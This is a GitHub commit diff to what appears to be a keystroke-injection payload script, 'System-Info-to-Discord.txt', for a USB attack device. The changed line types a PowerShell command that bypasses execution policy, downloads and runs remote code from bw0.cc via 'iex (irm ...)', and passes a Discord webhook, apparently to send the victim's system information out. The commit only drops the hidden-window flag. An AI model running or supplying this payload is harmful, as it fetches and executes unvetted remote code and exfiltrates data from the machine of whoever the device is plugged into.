Update System-Info-to-Discord.txt

This commit is contained in:
egieb
2025-06-20 10:53:08 +00:00
committed by GitHub
parent 81a5f9847d
commit e0d0c82313

View File

@@ -14,6 +14,6 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/info)
STRING powershell -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/info)
ENTER